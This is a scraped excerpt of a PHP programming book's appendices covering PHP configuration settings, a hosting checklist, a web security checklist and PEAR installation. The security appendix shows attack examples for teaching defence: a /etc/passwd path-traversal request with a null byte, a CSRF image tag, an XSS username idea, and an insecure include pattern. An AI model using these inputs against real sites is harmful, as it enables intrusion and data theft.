http://www.php.net/manual/en/configuration.php 2 http://www.php.net/manual/en/ini.php
  • 498. 474 The PHP Anthology In order for you to configure PHP with .htaccess files, your hosting provider must have applied the Apache setting AllowOverride Options or AllowOverride All to your web directory in Apache’s main httpd.conf configuration file. If that has been done, you can use two Apache directives to modify PHP’s configuration: php_flag used for settings that have Boolean values (that is, on/off or 1/0), such as re­ gister_globals php_value used to specify a string value for settings, such as the include_path setting Here’s an example of an .htaccess file: # Switch off register globals php_flag register_globals off # Set the include path php_value include_path ".:/home/username/pear" The final mechanism that controls PHP’s configuration is the group of functions that contains ini_set and ini_alter, which let you modify configuration settings, as well as ini_get, which allows you to check configuration settings, and ini_restore, which resets PHP’s configuration to the default value defined by php.ini and any .htaccess files. Here’s an example in which using ini_set allows us to avoid having to define our host, user name, and password when connecting to MySQL: ini_set('mysql.default_host', 'localhost'); ini_set('mysql.default_user', 'harryf'); ini_set('mysql.default_password', 'secret'); if (!mysql_connect()) { echo mysql_error(); } else { echo 'Success'; }
  • 499. Appendix A: PHP Configuration 475 Be aware that for some settings, such as error_reporting, PHP provides alternative functions that perform effectively the same job as ini_set. You can use whichever approach you prefer. Note that certain settings, such as register_globals, can only be usefully modified by php.ini or .htaccess, because such settings influence PHP’s behavior before it begins to execute your scripts. Furthermore, some configuration settings can be changed only in php.ini—exten­ sion_dir, for instance, which tells PHP the directory in which PHP extensions can be found. For a complete reference on controlling settings, refer to The PHP Manual.3 Key Security and Portability Settings Table A.1 shows the most important PHP settings that relate to the security and portability of your PHP scripts. Includes and Execution Settings Table A.2 shows the most important PHP settings that relate to includes, and how well your PHP scripts run. 3 http://www.php.net/ini_set
  • 500. 476 The PHP Anthology Table A.1. Key Security and Portability Settings Setting Default Notes register_globals off This setting automatically creates global variables from incoming HTTP request variables, such as GET and POST. For security and portability reasons, it’s strongly recommended that you switch off this setting. See the section called “Turning register_globals Off” in Chapter 1 or http://www.php.net/register_globals/ for more details. magic_quotes_gpc off This setting automatically escapes quotes in incoming HTTP request variables with a backslash, helping to prevent SQL injection attacks. If you know what you’re doing, it’s usually better to switch off this functionality and handle the escaping yourself when inserting data into a database, given the problems this feature can cause with forms, and the performance overhead they introduce. See the section called “Checking for Magic Quotes” in Chapter 1 for information on making your scripts compatible with this feature. call_time_pass_reference off This setting allows you to use variable references (e.g. htmlentities(&$string)) at call time. To keep code clean and understandable, and to ensure its portability, keep this functionality switched off. short_open_tag on This setting allows you to start a block of PHP code with just <? instead of the longer <?php. It also lets you write out PHP expressions with <?=, which is identical to <?php echo. While convenient, these shortcuts are not XML compliant, and can cause the PHP processor to become confused when it encounters XML processing instructions such as <?xml version="1.0"?>. Many people have short_open_tag switched off, so, for maximum portability, avoid the shortcuts and switch off this feature during development.
  • 501. Appendix A: PHP Configuration 477 Setting Default Notes asp_tags off A setting that allows ASP-style tags (<% … %>) to be used as an alternative to the PHP open and close tags (<?php … ?>). Few people use this feature, so, for maximum portability, it’s best to avoid them, and switch off this feature during development. error_reporting E_ALL & When developing, and for maximum portability, it’s ~E_NOTICE best to set this option to E_ALL (or E_STRICT in PHP 5), so that PHP will inform you of situations where, for example, a $_GET variable your code relies upon has not been initialized. This forces you to write code that’s more secure and contains fewer logic errors, in order to avoid warnings. This also ensures that your code will run neatly on other servers configured this way. display_errors on This setting determines whether or not PHP sends error messages to the browser. When you’re running your application in a live environment, it’s generally better to switch off this option, and instead to use PHP’s logging mechanism to capture errors to a file, for example. open_basedir not set This setting allows you to restrict all PHP file operations to a given directory and its subdirectories. This can be a good idea if, for example, you want to prevent a script that’s used to display the contents of files from being used to access sensitive files elsewhere on your server. allow_url_fopen on This setting allows you to specify remote file locations for use with functions like fopen (e.g. fopen('http://www.sitepoint.com/','r');). It’s a handy tool but is also potentially a security risk for a badly written script. Switch it off if you know you don’t need it.
  • 502. 478 The PHP Anthology Table A.2. Includes and Execution Settings Setting Default Notes include_path '.' This setting allows you to specify the relative and absolute paths that PHP should search when you use one of the include-related commands. Make sure you specify at least the current directory (.), or most third-party scripts will fail to work. On Unix systems, the list of directories is separated by colons (:), while on Windows the separator is a semicolon (;). To make your life easier, the constant DIRECTORY_SEPARATOR is set to represent the correct character based on the operating system, making it easier to produce cross-platform-compatible code. auto_prepend_file not set PHP will execute the file(s) specified in this setting before executing any requested script. This setting is useful for performing site-wide operations such as security, logging, defining error handlers, stripping backslashes added by the magic quotes feature, and so on. It’s also useful for applications that you’re sure you will only use yourself, but is unsuitable for use in code you intend to distribute, as those who are unable to modify php.ini settings with .htaccess files will be unable to use such code. The list separator is the same as that used for the include_path setting. auto_append_file not set The twin of auto_prepend_file, this setting is executed after a requested script is executed. max_execution_time 30 This setting specifies the maximum execution time (in seconds) for which a PHP script run via a web server may be allowed to execute. Generally, it’s best to leave this as the default setting and use the set_time_limit function to extend the limit on a per-script basis. A value of 0 for either setting removes limitations on script execution time.
  • 503. Appendix A: PHP Configuration 479 Setting Default Notes memory_limit 8M This setting determines the amount of memory PHP has available to it at runtime. Usually, the default is fine, but when you’re handling very large XML documents, for example, or dealing with images, you might need to increase it. The bigger this value, the more memory a script actually uses, and the less memory will be available for other applications running on your server. post_max_size 8M This setting reflects the maximum amount of data that PHP will accept via an HTTP POST (e.g. a form that uploads an image). You might need to increase this value if you have an application that will allow users to upload bigger files.“
  • 504. 480 The PHP Anthology Error-related Settings Table A.3 shows the most important PHP settings that relate to the way PHP handles errors. Note that display_errors and error_reporting are not included here, as they were described in Table A.1. Table A.3. Error-related Settings Setting Default Notes log_errors off This setting, in conjunction with error_log (below), allows you to log errors to a text file. It’s useful for a live site where you’ve switched off the display of errors to visitors. error_log not set This setting allows you to specify the name of a file to which errors are logged when log_errors is switched on. ignore_repeated_errors off Using this setting, if the same error occurs multiple times from the same line of a given PHP script, the error will only be reported once per script execution. This setting helps prevent the massive log files that can result from errors that occur in loops and are logged to a text file. ignore_repeated_source 30 This setting is similar to ignore_repeated_errors, but, in this case, it suppresses repeated errors of the same type throughout a PHP script. report_memleaks on Make sure this setting is switched on, especially if you’re using experimental versions or nonstable releases of PHP. Otherwise, you might end up crashing your server once leaked memory has eaten up all the available space. error_reporting must be set to report warnings for this setting to apply.
  • 505. Appendix A: PHP Configuration 481 Miscellaneous Settings Table A.4 shows additional important settings that you should be aware of in your PHP configuration. Table A.4. Miscellaneous Settings Setting Default Notes session.save_path /tmp If you’re storing sessions in files on a Windows-based system, you’ll need to modify this setting to an available directory to which PHP can write session files. session.use_cookies 1 This setting uses cookies to store the session ID on the client, rather than placing the session ID in the URL (which can present a risk to security). extension_dir './' This setting specifies the path under which compiled PHP extensions can be found. On Windows-based systems, it might be something like this: extension_dir = C:phpextensions extension On Windows-based systems only, this setting is used to identify all the extensions that should be loaded. The extensions specified should reside in the extension_dir path (above), for example, extension = php_xslt.dll.
  • 507. Appendix B: Hosting Provider Checklist PHP, and, more generally, the LAMP combination of Linux, Apache, MySQL, and PHP/Perl/Python, are widely available via literally thousands of web hosts at very affordable prices. You can easily access quality web hosting that will suit 90% of your needs quite inexpensively. That said, all PHP installations are not created equal—their capabilities depend largely on the configuration settings defined in php.ini, as well as the extensions the host has installed for you. A number of general issues relating to the amount of control you’re given over your own environment also deserve consideration if you’re to avoid trouble later on. This appendix summarizes the key issues you should investigate before paying for a hosting service. Contact potential providers and ask them to respond to each of these points. Follow up by asking for the opinions of other people who’ve used the service in question—there are many online forums where you’ll find people who are able to offer advice. Be aware, though, that the ratio of “knowledgeable” to “ig­ norant” people is stacked highly in favor of ignorance; familiarize yourself with technical details so that you’re able to verify that the answers you’re given are well informed. Some of the points I’ve included here may seem a little extreme, but once you’ve been around the block a few times, you’ll probably want to get value for your money, rather than spending your Saturday mornings fixing the problems your host made for you on Friday night. General Issues Consider these issues whichever host you’re looking at—they’re the key markers of a decent service. Does the host support Linux and Apache? From the point of view of performance and reliability, the Linux–Apache setup is the best combination. Ask for details of the Linux distribution. Although Red Hat and its derivatives (such as CentOS and Fedora) are popular, you might find hosts using Debian or Ubuntu—or, better yet, Rock Linux—know more about what they’re doing.
  • 508. 484 The PHP Anthology Avoid any host that uses Apache 2.x with a threaded multiprocessing module (MPM), as there are still many third-party libraries that aren’t thread safe. Stick with a host that offers Apache 2.x with the prefork MPM, or Apache 1.3.x. Does the host provide you with SSH access to the server? SSH gives you a secure connection to the server, through which you can perform tasks from the Linux command line, or transfer files with SCP (Secure Copy Protocol) or SFTP (SSH File Transfer Protocol). Avoid any host that allows you to use telnet, as this is a fundamentally insecure way to connect to a server over the Internet. For Windows users, Putty1 makes an excellent SSH client and command line tool, while WinSCP2 provides a secure file transfer mechanism using an SSH connection. Alternatively, make sure you can upload files using FTPS (FTP over SSL). Don’t transfer files with FTP—it’s as insecure as telnet. Is the host a reseller, or does it maintain servers itself? Resellers can provide significant value if you need help at a basic technical level (if, for example, you’re a beginner), but they generally have the same level of control over the server as you do. Going “straight to the source” means you won’t have to deal with delays when there are system problems, as you’ll likely be dealing directly with those who maintain the server. The downside is that they tend to be less newbie tolerant, so you might get answers—but not ones you can understand! To what degree does the host “overload” the server? Many web hosting companies create far more accounts on a server than the maximum for which the system is specified. To gauge the degree of server overload, the best metric is obtained using the uptime command (if you have access to use it); this will tell you the server load averages over one, five, and 15 minutes. Ideally, the server should never have load averages above one. Obviously, the issue isn’t really as simple as this, but once you see your server hit averages in excess of five, you’ll begin to experience significant delays in your PHP-based applications. 1 http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html 2 http://winscp.net/eng/
  • 509. Appendix B: Hosting Provider Checklist 485 What’s the hosting provider’s policy on running scripts and programs from the command line? MySQLDump is a very handy tool for backing up your database, but it’s no good if you can’t run it on your server. Some hosts automatically kill any command line application that executes for longer than a given time, so be sure to investigate this issue. Does the host provide you access to cron, the Unix utility that allows you to schedule batch jobs? If so, make sure the host allows command line scripts to be executed. Some hosts have taken to implementing cron so that it executes scripts via a web URL, but this is no use if the script in question uses the MySQLDump application to back up your database—a PHP script executed via Apache will typically run as a user, which will not have the correct permissions required for the job. PHP-related Issues These considerations relate specifically to PHP and the way it’s set up on the server. Can you see the output of phpinfo on the server you will actually be assigned to? Some hosts might claim this is a security risk, but expert hosts know that security by obscurity is no substitute for real security. The information provided by phpinfo is not a security risk to hosting providers that know what they’re doing, and have Linux, Apache, and firewalls correctly set up. What phpinfo tells you is the best way to confirm the facts. Is PHP installed as an Apache module (not the CGI variant)? PHP installed as an Apache module provides much better performance than if PHP is running in CGI mode.
  • 510. 486 The PHP Anthology Is the Apache settingAllowOverride set to Options or All? This setting will let you modify php.ini settings with .htaccess files. Is PHP Safe Mode disabled? The safe_mode option in php.ini is, in theory, a way to make PHP secure, and prevent users from performing certain tasks or using certain functions that are security sensitive. Safe Mode is nothing but a large headache if you’re doing any serious work in PHP. Check the upgrade policy of your host. Ask the host how much warning you will get before upgrades are performed. Check that they’ll provide you with a copy of the php.ini file they’ll be using for the upgrade before it happens—the number of hosts that, overnight, switch from register_glob­ als=on to register_globals=off is considerable. Make sure you test your applic­ ations on your development system against the new version before the host performs the upgrade. Ask for a list of installed PHP extensions. Confirm that these extensions match the requirements of your applications—few hosts, for example, bother to provide the XSLT extension. Confirm also that the host guarantees that all extensions will remain available between PHP upgrades. Will PHP be available for use from the command line? If not, you might alternatively require access to Perl or Python, or the ability to run shell scripts, if you’re happy with those languages. Usually, running a serious web site will require that you have the ability to run routine batch jobs (with cron) for tasks like backups, mailing yourself the PHP error log, and so on. What’s the host’s knowledge of PHP? Last but not least, throw in one or two questions that will test your hosting provider’s knowledge of PHP. Although it might not be the host’s job to write PHP code, when you find yourself in the position of knowing a lot more about PHP than your host,
  • 511. Appendix B: Hosting Provider Checklist 487 the end result is depressing. It’s important to have a host that understands your needs.
  • 513. Appendix C: Security Checklist Given that online PHP applications are exposed essentially to anyone and everyone, security should be on, if not at the top of, your list of concerns as you develop your applications. To some extent, the ease with which PHP applications can be developed is also one of the language’s greatest weaknesses: for beginners who aren’t aware of the possible dangers, it’s very easy to deploy an application for which the line of security has as many holes as Swiss cheese. Make sure you’re informed and, if in any doubt, prepared to ask questions. The Open Web Application Security Project (OWASP) is a corporate-sponsored com­ munity focused on raising the awareness of web security, and is an excellent source of information on potential dangers.1 They OWASP recently updated its list of the top ten common security flaws in web applications, the relevant points of which I’ve summarized here. The previous version from 2004 still contains relevant inform­ ation and, while there’s some duplication, it’s well worth a read.2 For a more detailed coverage of PHP security, you might like to read Essential PHP Security by Chris Shiflett,3 and php|architect’s Guide to PHP Security by Ilia Alshanetsky.4 Top Security Vulnerabilities This list comprises the most common—and dangerous—security flaws found in web applications today. Cross-site Scripting (XSS) Cross-site scripting attacks are the result of sending unchecked, user-supplied data to a browser. The problem with user-supplied data is that it’s completely outside of your control, and it’s easy to fake values like the HTTP referrer and the values in a hidden form field. 1 http://www.owasp.org/ 2 http://www.owasp.org/index.php/Top_10_2004 3 http://phpsecurity.org/ 4 http://www.phparch.com/pgps/
  • 514. 490 The PHP Anthology When dealing with forms, for example, validate the data carefully, and use a “deny all, permit a little” policy. For example, if a registration form has a field for the user’s username, allow only alphabetical characters and perhaps the numbers 0–9, rather than simply rejecting particular special characters. Use regular expressions to limit the data to exactly that which you require. Packages like PEAR::HTML_QuickForm, which we saw in “How do I build HTML forms with PHP?” in Chapter 5, provide built-in mechanisms for validating forms, and do a lot to help cover weaknesses you might otherwise neglect. Without these checks, it might be possible for a malicious user to create an account with a username like this: John Doe<script type="text/javascript">…</script> This username includes a JavaScript file that connects to another server and sends the current user’s session ID. Any person who then sees this username in the web browser (when browsing a forum, for example) will be sending his or her session ID to the remote server, allowing “John Doe” to connect to the web site as them. Of course, this tactic isn’t limited to user names; the same trick could be employed to exploit blog comment areas, the content of a forum post, or even the filename of an uploaded image. Less serious, but equally embarrassing, is when malicious users simply post HTML that “scrambles” the layout of your page, perhaps closing a table tag prematurely. Employ a separate markup language such as BBCode where pos­ sible,5 and eliminate HTML with PHP functions like strip_tags and htmlspecialchars (see Chapter 3 for more on this). If you really want to allow HTML to be posted to your application, consider building a filter based on 6 PEAR::XML_HTMLSax. Also, where items like include files are concerned, watch out for logic like this: include($_GET['page']); Make sure you check the value of $_GET['page'] against a list of files you intend to include in your code: 5 http://www.phpbb.com/community/faq.php?mode=bbcode 6 http://pear.php.net/package/XML_HTMLSax/
  • 515. Appendix C: Security Checklist 491 $pages = array('news.php', 'downloads.php', 'links.php'); if (in_array($_GET['page'], $pages)) { include $_GET['page']; } else { include 'not_found.php'; } Without such checks, it’s very easy for an attacker to use code similar to this to ex­ ecute other PHP scripts—even if you didn’t write them, and they’re not stored on your server. Injection Flaws Another example of the problems associated with the use of unchecked user-supplied data values in a script, injection flaws allow an attacker to influence the way PHP interacts with an external system, such as the file system or a database. An SQL injection attack occurs when an attacker uses a form or URL to modify a database query, and the topic was discussed in some detail in “How do I protect my web site from an SQL injection attack?” in Chapter 2. The bottom line is: escape all the data you receive from a user before you use it in a query. Malicious File Execution Any script that allows the execution of a file that doesn’t reside on the server will enable an attacker to execute arbitrary code on your server. The consequences of such an attack could involve the undetected extraction of data from your application, or a total compromise of your server. Malicious file execution attacks are applicable to any system that takes filenames, in part or in whole, or files from the user, and this issue ties in closely with that of cross-site scripting attacks. Insecure Direct Object Reference You’ve seen URLs such as this before:
  • 516. 492 The PHP Anthology http://site.com/view_order/?orderid=123 Perhaps you’ve tried changing the value of orderid. This is one example of a direct object reference attack—most are easy to prevent, however. For example, to make sure that a user can only see his or her own orders on your site, you might use SQL like the following to confirm that the ordered items stored in the database have the same user_id as the current user’s user_id session value: $sql = 'SELECT * FROM order WHERE order_id=' . intval( $_GET['orderid'] ) . ' AND user_id=' . $_SESSION['user']->get('user_id'); Another form of direct object reference attack can be made by exploiting the way files are referenced within a script. Scripts that reference files on the basis of user- submitted data could be used to reveal information stored outside the web site’s document root. For example, take this innocuous-looking URL: http://site.com/welcome/?lang=en Behind the scenes, this URL tells a page to display in English by including the en.lang.php script: include( $_GET['lang'] . '.lang.php' ); What do you imagine the following request would return from the above script? http://site.com/welcome/?lang=../../../../../../../etc/passwd%00 The ../s will push the request to the root of the file system, and the %00 on the end of that URL uses the null termination trick, which will exploit the insecure include in the PHP script to include the /etc/passwd file—the list of all system users on the server. Because all strings in PHP are null terminated, the PHP interpreter will not see the '.lang.php' appended to the end. Remember—user-submitted information is not limited to the URL and form para­ meters! You should check to ensure that unchecked cookie values, and HTTP request header and content values, aren’t used in your script, either.
  • 517. Appendix C: Security Checklist 493 Cross-site Request Forgery (CSRF) This type of attack forces victims to perform actions on another site without their consent. As an example, such an attack might include an image in a forum message using this code: <img src="http://www.google.com/accounts/ClearSID" /> This code would automatically log out of Google all forum visitors who visit the page on which this code appears. More devastatingly, a CSRF could result in your account details being altered, or even bank transfers being initiated, without your consent. Protection against this type of attack is actually easier for the site that’s being attacked than for the site that’s unknowingly hosting the attack. To protect against the auto­ matic submission of forms, you could create a random token that’s regenerated for every form view, and placed in a session variable and a hidden field in the form: <?php $_SESSION['token'] = md5( uniqid( rand(), true ) ); ?> <form action="sensitive_action.php" method="post"> <input type="hidden" name="token" value="<?php echo $_SESSION['token'] ?>"/> ⋮ …rest of the form </form> When the form is submitted, a script checks that the token matches the value in the session variable, which will only be the case if the form is loaded from the real site—the page fails if the request comes from elsewhere. Another option—especially for high-risk operations such as bank transfers and password changes—is to require the user to confirm changes. This way, a forged request will cause the real user to be prompted to confirm the action before it goes ahead. Information Leakage and Improper Error Handling When errors occur in scripts, information that can be useful to attackers might be leaked in error messages. Take, for example, a message such as this:
  • 518. 494 The PHP Anthology Warning: mysql_connect(): Access denied for user ➥ 'sitepoint'@'db.sitepoint.com' (using password: YES) ➥ in /var/www/index.php on line 12 This information gives a potential attacker the database server’s name, the database name, and the user name. Similarly, error messages that output erroneous SQL statements give attackers a small view into your database structure—possibly their first step towards SQL in­ jections. Refer to the section called “Key Security and Portability Settings” in Appendix A for information on disabling error output to the browser in production environments, and opting for error messages to be logged to a file instead. Broken Authentication and Session Management Broken authentication and session management vulnerabilities are closely tied to the inadequate protection of account and session data. We’ve already seen how sessions can be hijacked using cross-site scripting, and if the session is hijacked before a user logs in, the attacker simply needs to wait until the user logs in to gain full access to that person’s account. PHP offers the session_regenerate_id function,7 which should be used before any change in privilege level. Essentially, it maintains the session data, while changing the session ID. So after a user logs in, that person obtains a new session ID, and any previous sessions hijacked by the attacker are useless. You should also stick with PHP’s own session and cookie management functions—don’t write your own or use third-party scripts. Other measures you can take to prevent this type of vulnerability include ensuring that your site’s logout functionality completely destroys the session data, and automatically logging users out after a period of inactivity. It’s also advisable to not send passwords in plain text, either in emails or to be dis­ played on screen. If you must email a password, ensure the user has to change that password upon the next login before he or she can continue to use the site. 7 http://www.php.net/session-regenerate-id/
  • 519. Appendix C: Security Checklist 495 Insecure Cryptographic Storage First of all, when it comes to cryptography, don’t roll your own code. Second, re­ member that if you’re encrypting data using an algorithm that’s meant to be decoded, then someone else will also be capable of decoding it. Remember that, strictly speaking, MD5 and SHA are not encryption algorithms (that is, you can’t decrypt an MD5 string to obtain the original data); they are message digest algorithms. But if you don’t need to decrypt a value, use SHA-256, which is available through PHP 5.1.2’s hash8 [Usage: hash('sha256', $password);] function. If this is not an option, you can opt for the less secure MD5 hash, which is available through the md59 function. This technique allows you to compare the encrypted versions of two pieces of data (e.g. a stored password and that entered by a user), which avoids the risks involved in working with encrypted values that could possibly be decrypted by an attacker. Insecure Communications Sending any type of sensitive information in plain text isn’t just bad practice, it’s inexcusable. For example, if you’re asking a user to log in or provide credit card details, you should be securing the communications using SSL. If your application causes your server to talk to another server, for example a bank’s merchant services system, that communication should also be secured using SSL. Failure to Restrict URL Access Most applications will limit the links available to users on the basis of their privilege levels. For example, all users see a link to the homepage, but only administrators have access to the link to the list of users. However, many applications’ user author­ ization systems stop at that point, which means that anyone who types in the full URL to the user list page will gain access. Make sure that your users only see the links they can use, but also make sure that each page checks users’ privileges before allowing them to continue. 8 http://www.php.net/hash/ 9 http://www.php.net/md5/
  • 520. 496 The PHP Anthology More information on this topic is available at PHP Advisory,10 although, sadly, the site is no longer being maintained. 10 http://www.phpadvisory.com/
  • 521. Appendix D: Working with PEAR PEAR,1 the PHP Extension and Application Repository, is the brainchild of Stig Bakken, and was inspired by Perl’s CPAN.2 As a project, it was originally conceived in 1999 and reached its first stable release in January 2003. PEAR serves two purposes. First, it provides a library of PHP classes for solving common architectural problems, a number of which you’ve seen in this book. Second, under the title PECL (PHP Extension Code Library), PEAR provides a repository for extensions to PHP. PECL was originally intended to store nonstand­ ard extensions that lay more on the fringes of PHP, but it has since evolved into the default repository for all the extensions that aren’t included in the core PHP distri­ bution. Here, I’ll be concentrating on the PHP classes that PEAR provides. Those who submit work and maintain the PEAR repository are all volunteers. Ori­ ginally a small community of developers, the numbers of volunteers have grown significantly since the release of the first stable version of PEAR, and the group re­ ceives a greater focus from the PHP community as a whole. There’s still a lot of work to be done to raise the standards of PECL to that of PHP itself, documentation being a key area in which there’s still much room for improvement. If you’re strug­ gling with a PEAR package, a good place to start is PHPKitchen’s list of PEAR Tu­ torials.3 That said, PEAR already offers significant value in terms of reducing the effort required in developing PHP applications. But what does PEAR actually mean to you? Browse the list of packages,4 and you’ll see that PEAR provides many more classes, categorized by subject, to help you avoid having to reinvent wheels. It’s important to understand that the focus of PEAR classes is architectural issues, not application-level classes. In other words, you won’t find complete applications there; rather, you’ll find code that can be reused in many different applications. Also important is that the PEAR developer com­ munity does its best to maintain and support the library, which compares favorably with, say, the projects available via SourceForge,5 which are often individual en­ 1 http://pear.php.net/ 2 http://www.cpan.org/ 3 http://www.phpkitchen.com/index.php?/archives/668-PEAR-Tutorials.html 4 http://pear.php.net/packages.php 5 http://sourceforge.net/
  • 522. 498 The PHP Anthology deavours and come to a sudden end once the individuals in question stop contrib­ uting their time. Otherwise, there is some emphasis on maintaining a degree of standardization throughout the PEAR library. For example, all error handling should be performed using PEAR::Error, and the code should be documented using the PHPDoc standard, which means that if you can’t find the API documentation on the PEAR web site, you should be able to extract it using phpDocumentor,6 which we covered in some detail in “How can I document my code for later reference by myself or others?” in Chapter 13. Be warned: the degree of integration between the packages within PEAR is currently fairly low when compared to, say, the Java class library. This means that, in some cases, you’ll be confronted with decisions such as whether to use PEAR::HTML_QuickForm’s validation functionality, or PEAR::Validate, or both. It’s a good idea to invest some time investigating which option fits your development style up-front, rather than jumping straight in and using a PEAR class for a critical part of your application, only to discover later that it wasn’t the best solution to the problem. One important point to be clear on is that a reference to PEAR can actually mean one of two things: the repository as a whole, or the PEAR front end (also known as the package manager), which provides tools for installing and upgrading the PEAR packages you use. You’re not required to use the PEAR package manager to install PEAR packages. If you need to, you can download them directly from the PEAR web site and manually extract them to your PHP’s include path. Make sure you check the dependencies listed on the site (these are other required packages) and be aware that most packages implicitly require the PEAR base package for tasks like error handling.7 Installing PEAR These days, the foundations of PEAR are provided with the PHP distribution itself, but web hosts typically fail to provide customers with their own default PEAR in­ stallations, so it’s worth knowing how to go about installing PEAR from scratch. The process can differ slightly between Unix- and Windows-based systems. 6 http://www.phpdoc.org/ 7 http://pear.php.net/package/PEAR/
  • 523. Appendix D: Working with PEAR 499 Step one is to make sure you can run PHP scripts via the command line. This is al­ ways possible if you type the full path to the PHP binary. For a Unix-based system, you’d use the following: /usr/local/bin/php /home/username/scripts/my_script.php For Windows, you’d use something like this: c:phpcliphp.exe c:scriptsmy_script.php Note that in the Windows path above, we used the executable in the c:phpcli (command line interface) subdirectory of the PHP installation. This executable be­ haves slightly differently from that used by Apache to handle web pages. PHP binary releases for Windows since version 4.3.0 place the CLI version of the PHP executable in this directory. We can make PHP much easier to use from the command line by applying some changes to the system’s environment variables. For more information, see the PHP CLI manual pages.8 Next, point your browser at http://go-pear.org/, where you’ll see a PHP script. This script is used to install the PEAR package manager—the basis you’ll need in order to install other PEAR packages. Download this to your computer and save it as go- pear.php. From this point, you have a number of options. Storing go-pear.php somewhere under your web server’s document root directory will allow you to run the script as a web page. This behavior is still experimental, though, so there are no guarantees it’ll work correctly. If you do use this approach, make sure that the script is not publicly available! A better option is to execute the go-pear.php script via the command line: /usr/local/bin/php /home/username/pear/go-pear.php Here’s the command for Windows users: c:phpcliphp c:peargo-pear.php 8 http://www.php.net/features.commandline/
  • 524. 500 The PHP Anthology This command will launch an interactive command line interface, which will ask you questions about how you would like PEAR installed. Note that the installation prefix is the directory in which PEAR (as well as any packages you install later) will be installed, and is referred to as $prefix; $php_dir contains the path to your PHP installation (in which go-pear.php will put PEAR-related documentation by default, unless you specify otherwise). Windows users should be aware that changing the installation prefix will cause a Windows Browse dialog to display; you can use it to specify the directory you require. With the installation options set to your requirements, the go-pear.php script will connect to the PEAR web site and download all the packages required to set up the package manager (it also asks if you require additional packages, which are well worth having). Packages are installed in a subdirectory, called pear, that’s within the directory you specified as the installation prefix. So, in the above examples, you’d end up with c:pearpear or /home/username/pear/pear). Finally, if you let it, the go-pear.php installer will attempt to modify your in­ clude_path in php.ini. To do this manually, assuming you used the directories above, you’d specify the following: include_path = ".:/home/username/pear/pear" For Windows users, the path is as follows: include_path = ".;c:pearpear" Finally, to use the PEAR package manager from the command line, you’ll need to set up some environment variables. Windows users can automatically add these variables to their Windows registries by right-clicking on the file PEAR_ENV.reg and choosing Run from the menu that appears. The variables may also be manually configured as environment variables via the Windows Control Panel. Users of Unix­ based systems can configure the variables to be set up every time they log in. To do so, they must edit the file .profile in the home directory (/home/username): # Environment variables export PHP_PEAR_SYSCONF_DIR=/home/username/pear export
  • 525. Appendix D: Working with PEAR 501 PHP_PEAR_INSTALL_DIR=/home/username/pear/pear export PHP_PEAR_DOC_DIR=/home/username/pear/pear/docs export PHP_PEAR_BIN_DIR=/home/username/pear export PHP_PEAR_DATA_DIR=/home/username/pear/pear/data export PHP_PEAR_TEST_DIR=/home/username/pear/pear/tests export PHP_PEAR_PHP_BIN=/usr/local/bin/php Finally, you’ll need to add the PEAR command line script to your system path, which, on Windows, can be achieved through the System Control Panel application (on the Advanced tab, click Environment Variables). Simply append ;c:pear to the PATH variable. On Unix-based systems, add the following to the .profile script: export PATH=$PATH:/home/username/pear Once you’ve done all that, you’re ready to move on and use the package manager. The PEAR Package Manager Assuming you’ve set up PEAR correctly, you can now use the command line interface to the PEAR package manager to install packages. For example, take this command: pear install HTML_Common This line will install the package HTML_Common from the PEAR web site. The package names for the command line are the same as those on the web site. The PEAR Package Manager uses XML_RPC to communicate with the PEAR web site. If you’re behind a proxy server or firewall, you’ll need to tell PEAR the domain name of the proxy server like so: pear config-set http_proxy proxy.your-isp.com To unset the variable at some later stage, simply use this command:
  • 526. 502 The PHP Anthology pear config-set http_proxy "" To add HTML_QuickForm to the installed PEAR packages, you simply need to type the following: pear install HTML_QuickForm Should another release of HTML_QuickForm be made after you’ve installed it, you can upgrade the version with this command: pear upgrade HTML_QuickForm If, for some reason, you later decide you don’t need HTML_QuickForm any more, you can remove it using this line: pear uninstall HTML_QuickForm For a list of all the PEAR commands, simply type pear. Now, if you don’t like command lines, there’s also an (experimental) web-based front end to PEAR (there’s also a PHP-GTK front end, but it’s beyond the scope of this discussion). To use this tool, you need to install it from the command line, al­ though if you executed go-pear.php through your web server, the web-based front end will already have been installed for you. To install the front end, type the fol­ lowing commands: pear install Net_UserAgent_Detect pear install Pager pear install HTML_Template_IT pear install PEAR_Frontend_Web Note that the first three packages we’ve specified here are required by PEAR_Frontend_Web. Now you can launch the front end from your web server using the following simple script:
  • 527. Appendix D: Working with PEAR 503 <?php // Optional if include path not set # ini_set('include_path','c:htdocsPEAR'); require_once 'PEAR.php'; //For Windows users # $pear_user_config = 'c:windowspear.ini'; //For Unix users $pear_user_config = '/home/username/pear/pear/PEAR/pear ➥.conf'; $useDHTML = true; // Switch off for older browsers require_once 'PEAR/WebInstaller.php'; ?> Installing Packages Manually It’s possible to install PEAR packages manually (although this involves more work), but it’s important to watch the include paths carefully when you’re doing so. First of all, create a directory that will be the base of all the PEAR classes you install, making sure that this directory is in your include path. Next, install the main PEAR package.9 Download the latest stable version and extract it directly to the directory you’ve created, so that PEAR.php is in the root of this directory. Installing further packages can be completed in more or less the same fashion, but you need to be careful to choose the correct directories when you’re extracting the various files. For example, if you’re installing PEAR::DB, the main DB.php file goes alongside the PEAR.php file in the root of the PEAR class directory, while further PEAR::DB-related files belong in the subdirectory DB. The best way to check that you’ve selected the appropriate directories is to look at the package.xml file that comes with every PEAR package. There you’ll find an element called filelist, which lists all the files contained in the package and the locations at which they should be installed. For each file, check the baseinstalldir attribute—if it’s spe­ cified, it will tell you where the file should be placed relative to the root PEAR class directory. The name attribute specifies the path and filename, relative to the 9 http://pear.php.net/package/PEAR/
